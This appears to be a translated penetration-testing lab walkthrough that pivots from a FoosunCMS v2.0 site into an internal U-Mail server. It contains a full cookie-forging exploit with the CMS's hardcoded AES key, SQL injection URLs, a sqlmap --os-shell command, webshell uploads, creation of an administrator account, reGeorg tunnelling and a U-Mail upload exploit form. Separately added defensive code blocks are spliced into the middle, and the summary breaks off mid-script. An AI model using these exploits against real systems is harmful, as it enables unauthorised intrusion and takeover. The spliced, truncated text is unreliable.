
Title: An experimental walkthrough of pivoting from the external network into the internal network


Intranet roaming topology diagram (image omitted)

Using the login bypass vulnerability to enter the back end

Target website IP: 192.168.31.55. Bind the target's IP to www.test.com in the local hosts file (accessing the site directly by IP makes the pages load incompletely). Visiting www.test.com returns the site's home page, which turns out to be a static HTML site.

After clicking around, I found that the website was built with FoosunCMS.

The version is v2.0, which has exploitable vulnerabilities: the administrator account check can be bypassed to enter the back end directly, which is a very dangerous flaw. The back-end address of the website is /manage/Index.aspx.

A search shows that FoosunCMS v2.0 has a login bypass vulnerability, so I tried the bypass. Visiting the link below returns the UserNumber:

http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin

The UserNumber is found to be encrypted and spliced into a cookie, after which the login succeeds.

Use SQL injection to get the UserNumber, then splice it with the UserName and other fields to construct the cookie and log in directly with administrator privileges. The exploit code is as follows:

```python
#coding:utf-8
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex

#################################
# search keyword:
# inurl:/manage/Login.aspx
#################################

KEY = 'Guz(%hj7x89H$yuBI0456FtmaT5fvHUFCy76*h%(HilJ$lhj!y6(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7!hg4ui%$hjk'


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='the url', required=True, nargs='+')
    return parser.parse_args()


def run(url):
    try:
        usernumber = get_usernumber(url)
        if usernumber is not None:
            encrypt_cookie = generate_cookie(usernumber)
            # Write to cookie
            write_cookie(url, encrypt_cookie)
    except Exception:
        traceback.print_exc()


def get_usernumber(url):
    fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
    content = urllib.urlopen(fullurl).read()
    index = content.index('<option value=\'')
    if index != -1:
        usernumber = content[index+15:]
        usernumber = usernumber[0: content.index('\'')+1]
        print 'Get usernumber success. Usernumber is :', usernumber
        return usernumber
    else:
        print 'Get usernumber fail'
        return None


def pkcs7padding(data):
    bs = AES.block_size
    padding = bs - len(data) % bs
    padding_text = chr(padding) * padding
    return data + padding_text


def generate_cookie(usernumber):
    orgstr = '%s,admin,0,1,False' % (usernumber,)
    cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
    ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
    ciphertext = base64.b64encode(ciphertext)
    return ciphertext


def write_cookie(url, ciphercookie):
    print 'Generate Cookie[SITEINFO]:', ciphercookie
    print 'Now you can write cookie and access the url: %s/manage/index.aspx' % (url,)


if __name__ == '__main__':
    args = parse_args()
    try:
        if args.url is not None:
            run(args.url[0])
    except Exception, e:
        print 'python Foosun_exp.py -u [url]'
```

After execution, the encrypted cookie that bypasses the back-end login was obtained.
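As an added, defender-side illustration (not code from the post or from FoosunCMS): the SITEINFO cookie above can be forged because it is AES-CBC ciphertext under a key and IV that are the same in every installation, with no integrity check and no expiry. The token scheme below is an assumed replacement design: an HMAC-SHA256 signature over the session fields under a per-deployment random secret, with expiry and constant-time comparison, so a client who knows the format still cannot mint a valid administrator token.

```python
"""Assumed hardened session token (illustration, not FoosunCMS code)."""
import base64
import binascii
import hashlib
import hmac
import json
import os
import time

# Per-deployment secret generated at install time; never embedded in source.
SECRET = os.urandom(32)


def _sign(payload: bytes, secret: bytes) -> str:
    return hmac.new(secret, payload, hashlib.sha256).hexdigest()


def make_token(user_id: str, role: str, ttl: int = 3600,
               secret: bytes = SECRET, now=None) -> str:
    """Build 'base64(body).hmac' where body carries uid, role and expiry."""
    now = int(time.time()) if now is None else now
    body = json.dumps({"uid": user_id, "role": role, "exp": now + ttl},
                      separators=(",", ":")).encode()
    b64 = base64.urlsafe_b64encode(body).decode()
    return f"{b64}.{_sign(body, secret)}"


def verify_token(token: str, secret: bytes = SECRET, now=None):
    """Return the session dict, or None if malformed, tampered, signed under
    another deployment's secret, or expired."""
    now = int(time.time()) if now is None else now
    try:
        b64, sig = token.split(".", 1)
        body = base64.urlsafe_b64decode(b64)
    except (ValueError, binascii.Error):
        return None
    # Constant-time comparison: the signature covers every session field.
    if not hmac.compare_digest(sig, _sign(body, secret)):
        return None
    data = json.loads(body)
    return data if data["exp"] > now else None
```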

Write the encrypted cookie printed by the script into the browser's cookies using EditThisCookie.

Then visit http://www.test.com/manage/Index.aspx and the back end opens successfully.

Note: if the following error appears when running the exp script, the Python Crypto.Cipher package needs to be installed.

Install the encryption package:

```
pip install pycryptodome
```

Using the file upload vulnerability to get a shell

After entering the back end and opening the control panel's system parameter settings, the allowed upload file types can be modified at the upload point, and the aspx extension can be added to them.

Files can be uploaded in the plug-in management advertising system. I tried uploading an aspx one-liner webshell and it uploaded successfully, returning the path of the uploaded file. Connecting to the uploaded aspx one-liner with Chopper (菜刀, "kitchen knife") succeeded, but the permission was not SYSTEM.

Next I tried to get an interactive shell with sqlmap by feeding it the injection point found above:

http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin

Use sqlmap to obtain an interactive shell:

```
sqlmap.py -u 'http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin' --os-shell
```

The interactive shell was obtained successfully and ran with SYSTEM permission. I used sqlmap to try writing a one-liner webshell (supplementary note: pay attention to escaping) and connected to it with Chopper successfully. Using the sqlmap interactive shell to add a user failed at first: the message said the password did not meet the password policy requirements (complexity too low). After strengthening the password complexity and adding the user again, the command executed successfully and the new user was added to the administrators group. Checking from the sqlmap interactive shell, the host IP was 192.168.1.123, not the 192.168.31.55 we visited.

So it is likely that an IP on another network segment is being forwarded into this one.

Setting up a proxy to penetrate the other intranet and roam it

Checking showed that port 3389 was open, so I used the administrator account and password added earlier to log in remotely over 3389. On the desktop of the administrator user there was a notepad file containing two sets of account credentials.

With the discovered credentials, I logged in to the router management interface at www.test.com port 8080, which restricts login by IP; we guessed it may be configured to allow intranet IPs only. After setting up a local proxy, we logged in successfully: it was an intranet router. After logging in to the router, we found a website at 172.19.23.123 behind it.

Here we use reGeorg plus proxychains in Kali for the intranet penetration. First, edit the proxychains configuration: open a Kali terminal, run the command below, and remove the comment character before dynamic_chain:

```
vi /etc/proxychains.conf
```

After setting the port, save and exit, then switch to the reGeorg-master directory and open the proxy tunnel; the following page indicates the proxy is working:

```
python reGeorgSocksProxy.py -p 2333 -l 0.0.0.0 -u http://www.test.com/files/tunnel.aspx
```


Open Firefox through the proxy. Note: prefixing a command with proxychains runs that command through the proxy:

```
proxychains firefox
```
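As an added detection-side example (not part of the original post), the following Python flags two of the web-server-side traces this chain leaves: the UNION-based query against City_ajax.aspx, and the burst of POSTs to a single .aspx file that an HTTP tunnel such as reGeorg generates. The log lines, field layout and threshold are constructed for the example.

```python
"""Detection over constructed IIS-style log lines (illustration only)."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log. Fields: date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2022-01-24 16:30:01 GET /user/City_ajax.aspx CityId=1 10.0.0.8 200
2022-01-24 16:30:05 GET /user/City_ajax.aspx CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User 10.0.0.8 200
2022-01-24 16:31:10 GET /manage/Index.aspx - 10.0.0.8 200
""" + "".join(
    f"2022-01-24 16:33:{i:02d} POST /files/tunnel.aspx - 10.0.0.8 200\n" for i in range(25)
)

SQLI_RE = re.compile(r"\bunion\b[\s\S]*\bselect\b", re.IGNORECASE)
TUNNEL_THRESHOLD = 20  # POSTs to one .aspx from one client before we alert (assumed)


def parse_line(line):
    """Split one W3C-style line into a dict; the query string is URL-decoded."""
    date, time, method, stem, query, ip, status = line.split()
    return {"ts": f"{date} {time}", "method": method, "stem": stem,
            "query": "" if query == "-" else unquote(query),
            "ip": ip, "status": int(status)}


def detect(log_text):
    """Return (rule, client-ip, uri-stem) tuples for matched events."""
    alerts = []
    posts = Counter()
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        # Rule 1: UNION-based injection or direct reference to the CMS user table.
        if SQLI_RE.search(ev["query"]) or "fs_sys_User" in ev["query"]:
            alerts.append(("sqli", ev["ip"], ev["stem"]))
        # Rule 2: count POSTs per (client, .aspx) to spot a tunnel endpoint.
        if ev["method"] == "POST" and ev["stem"].lower().endswith(".aspx"):
            posts[(ev["ip"], ev["stem"])] += 1
    for (ip, stem), n in posts.items():
        if n >= TUNNEL_THRESHOLD:
            alerts.append(("http-tunnel", ip, stem))
    return alerts
```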


Using the account password we found above, we logged in to the website successfully and found that it is U-Mail (a webmail CMS). A very serious file upload vulnerability was disclosed in U-Mail, so we can test whether this site has fixed it. The exploit page is as follows:

```html
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
<FORM name=form1 method=post action='http://172.19.23.123/webmail/client/mail/index.php?module=operate&action=attach-upload' enctype=multipart/form-data>
<input type='file' name='Filedata' size='30'>
<INPUT type=submit value='Submit' name=Submit>
</FORM>
```

Open the constructed HTML page through the proxy, then upload a PHP big webshell (大马) with a .jpg extension.


After the upload succeeds, the file's file_id is displayed. Use the following payload to obtain the user_id of the currently logged-in user, which is 3:

http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk

Use the disclosed user_id and file_id to construct the path of the uploaded webshell, and exploit the PHP path parsing vulnerability: appending /.php to the path makes it execute as PHP.

Summary

1. Access the web port of the target system and identify its CMS through online fingerprinting as FoosunCMS. The site has a known back-end injection vulnerability, and the version is v2.0: http://www.test.com
2. Visit the following address to obtain the administrator's UserNumber: http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
3. Access the back-end page directly: http://www.test.com/manage/Index.aspx
4. Use SQL injection to get the UserNumber, then splice it with the UserName and other fields to construct the cookie and log in directly with administrator privileges. The exploit code is as follows: #coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher imp
